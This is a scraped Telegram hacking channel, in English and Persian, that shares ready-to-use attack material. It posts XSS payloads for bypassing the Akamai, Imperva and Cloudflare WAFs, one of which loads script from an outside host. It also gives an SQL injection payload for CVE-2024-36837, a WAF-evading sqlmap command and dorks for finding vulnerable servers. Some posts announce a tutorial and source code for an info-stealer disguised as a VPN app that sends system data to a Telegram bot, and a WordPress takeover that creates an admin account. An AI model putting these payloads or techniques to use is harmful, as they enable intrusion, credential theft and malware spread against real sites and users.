Eʀᴏ ··ʜᴀᴄᴋ··
4.83K subscribers
65 photos
27 videos
10 files
104 links
🗡 A blackish gray hat hacker 🗡

🎯 Bug Bounty | Ethical Hacking | Web Exploits
📚 Tips, Writeups, Tools & Real Reports

Admin: @GoRunEro
加入频道
⚠️XSS Bypass Akamai, Imperva and CloudFlare

☠️Payload
<A HRef=//X55.is AutoFocus %26%2362 OnFocus%0C=import(href)>


#XSS #Payload
🔹🔺🔹🔺🔹🔺🔹🔺🔹
Erohack
💧Boost
🐦Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
💯5🔥2🫡1🗿1
‼️DorkGPT - Generate Google Dorks with AI

🔗DorkGPT

#Dork #ai
🔸🔸🔸🔸🔸🔸🔸🔸🔸🔸
🌐EroHack
👍Boost
🖥Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
4👍2💯1🎃1
😮داشتم در مورد اکسپلویت نویسی مطالعه می کردم ی کتاب عالی به زبان فارسی پیدا کردم
گفتم بزارم شاید ب کار تون بیاد.



🔖The Art of Exploitation, First Edition
📚کتاب هنر اکسپلویت (Hacking)
🖋نویسنده: Jon Erickson
⚜️مترجم : سعید بیکی
🔰زبان : فارسی

🚫🚫🚫🚫🚫🚫🚫🚫🚫🚫
🌐EroHack
👍Boost
🖥Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
👍71🔥1👾1
🔥 Google Dorker
  Google Dorking
یا گوگل هکینگ همگی مفهوم یکسانی دارند و به موضوع یکسانی اشاره می کنند. Google Dork به معنی افشای اطلاعات امنیتی به صورت ناخواسته در اینترنت است. گوگل تنها یک موتور جستجوگر است که برای یافتن متن ، تصاویر ، فیلم ها و اخبار استفاده می شود اما برای یک هکر می تواند ابزار کاربردی و مفیدی باشد


💻Install Tools
🔻pip install lolcat

🔻git clone https://github.com/Err0r-ICA/TheDorker

🔻cd TheDorker

🔻chmod +x *

🔻bash Dork

🔹🔺🔹🔺🔹🔺🔹🔺🔹
Erohack
💧Boost
🐦Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4🔥2🎃1👾1
🔥WAF AKAMAI Bypass 
Lead to 30 XSS in large BBP


"><input type="hidden" oncontentvisibilityautostatechange="confirm(/Bypassed/)" style="content-visibility:auto">

#BugBounty #Tips #Waf
🔸🔸🔸🔸🔸🔸🔸🔸🔸🔸
🌐EroHack
👍Boost
🖥Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4👍1💯1🎃1🗿1👾1
Media is too big
VIEW IN TELEGRAM
آموزشی که قولش رو داده بودم

ارسال اطلاعات سیستم به بات تلگرامی در قالب آپ فیلترشکن💀
ری‌اکشن فراموش نشه👍
Training to send system information in the form of a secret filter breaking application. Don't forget
support and reaction.
Do not forget the reaction👍

🔹🔺🔹🔺🔹🔺🔹🔺🔹
Erohack
💧Boost
🐦Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
🤯3🔥2👾2💯1🎃1
source code.zip
2.9 KB
🔺مربوط به آموزش بالا🔹
password: @erohack0
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥52👍1💯1
😒SQL Injection in WordPress Plugin

Fofa Query :: body="/wp-content/plugins/email-subscribers/" 2-
publicwww : "/wp-content/plugins/email-subscribers/"


#sql #sql_injection
🚫🚫🚫🚫🚫🚫🚫🚫🚫🚫
🌐EroHack
👍Boost
🖥Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4🔥21💯1
This media is not supported in the widget
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6👎3🫡1
⭐️CVE-2024-23692 POC - Unauthenticated RCE Flaw in Rejetto HTTP File Server

Fofa Dork: "HttpFileServer" && server=="HFS 2.3m"


🌐Exploit

#Exploit #Cve #Poc

🌐EroHack
👍Boost
🖥Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3💯2🔥1🎃1👾1
🪱CVE-2024-36837 - SQLI Injection

🔪Payload:
0-3661)%20OR%20MAKE_SET(8165=8165,7677)%20AND%20(4334=4334


#CVE #SQLI #Payload
✍️✍️✍️✍️✍️✍️✍️✍️✍️✍️
✈️EroHack
Boost
🖥Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5💯1🎃1
🪳SQLmap Tamper Scripts - WAF bypass

sqlmap -u 'site.com/search.cmd?for…' --level=5 --risk=3 --tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes --no-cast --no-escape --dbs --random-agent


#WAF #Bypass #sqlmap
🚫🚫🚫🚫🚫🚫🚫🚫🚫🚫
🌐EroHack
👍Boost
🖥Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7🎃3🔥1
🪐نفوذ به سایت وردپرسی با استفاده از پلاگین

توضیحات:
ما با استفاده از یک پلاگین وردپرس تونستیم به پنل پیشخوان وردپرس دسترسی پیدا کنیم و صفحه لاگین رو به بات تلگرام ارسال کنیم و یک یوزر با سطح دسترسی ادمین ایجاد کنیم.
Using the WordPress plugin, we were able to access the WordPress counter panel and send the login page to the Telegram bot and create a user with admin access
level.

🌟
برای آپلود آموزش ری‌اکشن فراموش نشه.
👁
React to embed the tutorial.

🔸🔸🔸🔸🔸🔸🔸🔸🔸🔸
🌐EroHack
👍Boost
🖥Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
👍19🔥3🤣3🫡3👾1
🏔Fuzzing Subdomain with WFUZZ

wfuzz -c -w subdomains -u "FUZZ[.]target" --sc 200,301,301,401 -Z


#bugbountytips #bugbounty

🌐EroHack
👍Boost
🖥Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥6👾2💯1
Media is too big
VIEW IN TELEGRAM
⚡️آموزش نفوذ به پنل وردپرس با پلاگین

توضیحات:
با استفاده از یک پلاگین ساده تونستیم آدرس صفحه لاگین ادمین رو پیدا کنیم و یک کاربر با سطح دسترسی ادمین ایجاد کنید.


#WordPress #hack #Payload
✍️✍️✍️✍️✍️✍️✍️✍️✍️✍️
✈️EroHack
Boost
🖥Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5👍1🎃1🫡1👾1
Security-WP.zip
1.4 KB
⚪️مربوط به پست بالا⚪️
pass: @erohack0
Please open Telegram to view this post
VIEW IN TELEGRAM
🤯7👍1💯1
😠SQLI Injection
CVE: 2024-36837

💻Payload: 0-3661)%20OR%20MAKE_SET(8165=8165,7677)%20AND%20(4334=4334 


#BugBounty #Tips
🚫🚫🚫🚫🚫🚫🚫🚫🚫🚫
🌐EroHack
👍Boost
🖥Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6💯1👾1
😀XSS in Office.com. The + made a difference.

Payload:‍‍‍
`'>+<script>alert()</script>`

#BugBounty #Tips #XSS

🌐EroHack
👍Boost
🖥Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥8💯2🎃1